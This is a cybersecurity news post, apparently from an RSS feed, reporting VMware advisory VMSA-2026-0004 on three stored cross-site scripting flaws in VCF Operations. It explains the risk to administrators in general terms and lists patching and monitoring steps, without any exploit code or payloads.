<p>The vulnerabilities, tracked as <strong>CVE-2026-41722, CVE-2026-41723, and CVE-2026-41724</strong>, were published under security advisory <strong>VMSA-2026-0004</strong> on June 8, 2026. The flaws carry a <strong>CVSS score of 8.0</strong>, highlighting the potential risk to enterprise environments running affected versions of VCF Operations.</p>



<p>Because these vulnerabilities involve stored cross-site scripting (XSS), attackers may be able to plant malicious code that executes whenever administrators access compromised sections of the platform.</p>



<h2 class="wp-block-heading"><strong>How the Vulnerabilities Work</strong></h2>



<p>According to VMware, the flaws stem from improper handling of user-supplied input within VCF Operations management interfaces.</p>



<p>The platform fails to properly validate and sanitize certain data before displaying it to users. As a result, attackers can store malicious JavaScript code within the application. When an administrator or another privileged user later views the affected page, the malicious script automatically executes in their browser.</p>



<p>Unlike reflected XSS, where the payload travels in a crafted request and must be delivered to each victim separately, stored XSS persists in the application's own data until it is removed, so every privileged user who later views the affected page is exposed, increasing the chances of successful exploitation.</p>



<p>A successful attack could allow threat actors to:</p>



<ul class="wp-block-list">
<li>Hijack administrator sessions</li>



<li>Steal authentication tokens</li>



<li>Access sensitive information</li>



<li>Modify configuration settings</li>



<li>Perform unauthorized actions</li>



<li>Maintain persistence within the environment</li>



<li>Potentially move deeper into connected infrastructure</li>
</ul>



<h2 class="wp-block-heading"><strong>Why Organizations Should Take This Seriously</strong></h2>



<p>VCF Operations often serves as a central management platform for virtualization, cloud resources, and infrastructure operations. In many organizations, it integrates with other VMware services, including vCenter and cloud automation environments.</p>



<p>Because of this connectivity, a successful compromise could have broader consequences beyond a single application.</p>



<p>Security experts warn that attackers may attempt to combine these vulnerabilities with other weaknesses or misconfigurations to gain additional access and privileges across enterprise environments.</p>



<p>The risk is especially high in organizations where multiple administrators regularly access shared management consoles, as any authorized user visiting a compromised interface could unknowingly trigger the malicious code.</p>



<h2 class="wp-block-heading"><strong>No Workarounds Available</strong></h2>



<p>VMware has confirmed that there are currently <strong>no workarounds</strong> for these vulnerabilities.</p>



<p>Organizations are strongly advised to install the latest security updates as soon as possible. Delaying remediation could increase the risk of exploitation, particularly if proof-of-concept code becomes publicly available.</p>



<p>Administrators should also consider the following security measures:</p>



<ul class="wp-block-list">
<li>Apply VMware security patches immediately</li>



<li>Restrict access to VCF Operations interfaces</li>



<li>Monitor logs for unusual activity</li>



<li>Review administrator account permissions</li>



<li>Watch for suspicious session behavior</li>



<li>Investigate unexpected script execution events</li>



<li>Strengthen overall access controls</li>
</ul>



<p>While web application firewalls and browser security controls may provide limited protection, VMware emphasizes that these measures should not replace patching.</p>



<p>The disclosure of these vulnerabilities serves as another reminder that enterprise management platforms remain valuable targets for attackers. Securing these critical control systems is essential for protecting modern virtualized and cloud-based environments.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/vmware-stored-xss-flaws/">VMware Stored XSS Flaws Put Enterprise Environments at Risk</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/vmware-stored-xss-flaws/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
